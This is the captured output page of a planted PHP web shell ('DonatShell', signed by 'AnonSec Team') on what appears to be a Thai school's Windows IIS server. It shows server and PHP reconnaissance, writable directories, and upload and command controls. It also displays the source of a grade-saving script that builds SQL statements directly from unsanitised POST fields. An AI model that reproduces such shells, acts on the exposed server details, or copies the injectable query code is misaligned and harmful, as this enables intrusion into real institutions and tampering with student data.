%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/mis/teacher/subject_score_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/mis/teacher/subject_score_v2/SaveScore_RTAW.php
<?PHP
include("conf.php");
session_start();
// print_r($_POST);
// exit();
$Modify =  $_SESSION["IDTeacher"] . "@" . date("Ymd#h:i:s");
// if($_SESSION["IDTeacher"]=="804") { 
//     print_r($_POST);
//     //echo strpos($_POST['PClass'], "ป");
//     exit();
//   }
for ($i = 1; $i <= count($_POST['IDStudent']); $i++) {
  //echo $i  . " => " . $_POST['IDStudent'][$i] . " , " . $_POST['ScoreMark'][$i] . ", " . $_POST['Score'][$i] . "<BR>";
  $tmpTerm = $_SESSION["Term"];
  //if (strpos($_POST['PClass'], "ป") > -1) {
  //  $tmpTerm = "_";
  //}
  // if ($_SESSION["AYear"] == "2566" && $tmpTerm == "_") {
  //   $sql = "delete from TBStudentRTAW where RegYear='" . $_SESSION["AYear"] . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and IDStudent='" . $_POST['IDStudent'][$i] . "'";
  //   $query = sqlsrv_query($conn, $sql);
  // }
  $sql = "select * from TBStudentRTAW where RegYear='" . $_SESSION["AYear"] . "' and RegTerm='" . $tmpTerm . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and IDStudent='" . $_POST['IDStudent'][$i] . "'";
  //echo $sql; exit();
  $params = array();
  $options =  array("Scrollable" => SQLSRV_CURSOR_KEYSET);
  $stmt = sqlsrv_query($conn, $sql, $params, $options);
  $row_count = sqlsrv_num_rows($stmt);
  if ($row_count > 0)
    if($_POST['Score'][$i]=="0") {
      $sql = "delete from TBStudentRTAW  where RegYear='" . $_SESSION["AYear"] . "' and RegTerm='" . $tmpTerm  . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and IDStudent='" . $_POST['IDStudent'][$i] . "'";
    } else {
      $sql = "update TBStudentRTAW set ScoreRange=" . $_POST['Score'][$i] . ",Modify='" . $Modify . "',PClass='" . iconv("utf-8", "tis-620", $_POST['PClass']) . "',PRoom='".$_POST['PRoom']."' where RegYear='" . $_SESSION["AYear"] . "' and RegTerm='" . $tmpTerm  . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "' and IDStudent='" . $_POST['IDStudent'][$i] . "'";
    }
  else
    $sql = "insert into TBStudentRTAW (RegYear,RegTerm,PSubjectCode,IDStudent,Scorerange,Modify,PClass,PRoom) values('" . $_SESSION["AYear"] . "','" . $tmpTerm  . "','" . iconv("utf-8", "tis-620", $_POST['PSubjectCode']) . "','" . $_POST['IDStudent'][$i] . "','" . $_POST['Score'][$i]  . "','" . $Modify . "','" . iconv("utf-8", "tis-620", $_POST['PClass']) . "','".$_POST['PRoom']."')";
  //  echo $i . " - " . $sql . "<BR>";
  //  exit();
  $stmt = sqlsrv_query($conn, $sql);
  //echo $sql."<BR>";
  if ($stmt === false) {
    echo "<h3 class='text-danger'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</h2>";
    exit();
    break;
  }
}
echo "<h3 class='text-success'>บันทึกคะแนนเสร็จสมบูรณ์...</h2>";
exit();

Anon7 - 2022
AnonSec Team